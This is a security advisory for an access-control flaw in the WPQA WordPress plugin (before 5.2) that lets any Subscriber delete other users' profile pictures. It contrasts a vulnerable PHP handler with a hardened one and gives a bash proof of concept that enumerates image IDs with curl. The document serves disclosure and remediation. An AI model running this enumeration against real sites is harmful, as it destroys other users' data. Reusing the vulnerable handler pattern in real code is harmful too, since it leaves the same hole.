WordPress Plugin Vulnerabilities

WPQA < 5.2 - Subscriber+ Arbitrary Profile Picture Deletion via IDOR

Description

The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the value passed to the image_id parameter of the wpqa_remove_image AJAX action belongs to the requesting user. Any authenticated user, with privileges as low as Subscriber, can therefore delete the profile picture of any other user by supplying (or enumerating) another user's image ID; the nonce check only proves the request came from a logged-in session, not that the session owns the image.
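The following is an added illustration and is not the WPQA plugin's own code: a minimal wp_ajax handler showing the pattern the advisory describes (nonce verified, ownership not), next to the same handler with the ownership check a fix needs. The function names, the meta key example_avatar_id and the nonce action name are assumptions made for the example.

```php
<?php
// Added example, not WPQA's code. Function names, the meta key
// 'example_avatar_id' and the nonce action are assumptions.

// Vulnerable pattern: the nonce only proves the request was sent from a
// logged-in user's page. Nothing ties image_id to that user, so any
// Subscriber can delete any attachment by iterating image_id.
function example_remove_image_vulnerable() {
    check_ajax_referer( 'wpqa_remove_image', 'wpqa_remove_image' );
    $image_id = absint( $_POST['image_id'] ?? 0 );
    wp_delete_attachment( $image_id, true );
    wp_send_json_success();
}

// Hardened pattern: same nonce, but the attachment must belong to the
// requester and must be the avatar recorded in the requester's own user
// meta before anything is deleted.
function example_remove_image_hardened() {
    check_ajax_referer( 'wpqa_remove_image', 'wpqa_remove_image' );

    $user_id  = get_current_user_id();
    $image_id = absint( $_POST['image_id'] ?? 0 );
    if ( ! $user_id || ! $image_id ) {
        wp_send_json_error( 'bad request', 400 );
    }

    // Check 1: the attachment exists and its author is the current user.
    $attachment = get_post( $image_id );
    if ( ! $attachment
        || 'attachment' !== $attachment->post_type
        || (int) $attachment->post_author !== $user_id ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Check 2: the ID is the one stored for this user (assumed meta key).
    // This also stops a user from deleting some other attachment they own
    // that is not their avatar.
    $meta_key = 'example_avatar_id';
    if ( (int) get_user_meta( $user_id, $meta_key, true ) !== $image_id ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Only now act, and clear the reference so the profile no longer points
    // at a deleted file.
    if ( ! wp_delete_attachment( $image_id, true ) ) {
        wp_send_json_error( 'delete failed', 500 );
    }
    delete_user_meta( $user_id, $meta_key );
    wp_send_json_success();
}

// Registered on wp_ajax_ only (no wp_ajax_nopriv_), so unauthenticated
// requests never reach the handler.
add_action( 'wp_ajax_example_remove_image', 'example_remove_image_hardened' );
```

The two checks are deliberately redundant: the post_author test catches a forged ID for an attachment the requester never uploaded, and the user-meta test pins the action to the one object the feature is meant to manage. A capability test such as current_user_can() is not a substitute here, because Subscribers legitimately may remove their own avatar; the missing control is object-level ownership, which is what an IDOR is.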

Proof of Concept

#!/bin/bash
# PoC: enumerate image IDs against the wpqa_remove_image AJAX action.
# The nonce, cookie and meta_id below are sample values; replace them with
# values from the attacker's own authenticated (Subscriber) session.
nonce=aae369a8e3
for i in {1..100000}; do
  curl 'https://vulnerable.website/wp-admin/admin-ajax.php' \
    -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
    -H 'X-Requested-With: XMLHttpRequest' \
    -H 'Cookie: something=something' \
    --data-raw "action=wpqa_remove_image&wpqa_remove_image=${nonce}&image_name=you_avatar&image_type=user_meta&meta_id=6723&image_id=${i}"
done

Affects Plugins

Fixed in 5.2

Classification

Miscellaneous

Original Researcher
Binit Ghimire
Submitter
Binit Ghimire
Verified
Yes

Timeline

Publicly Published
2022-04-21
Added
2022-04-21
Last Updated
2022-04-22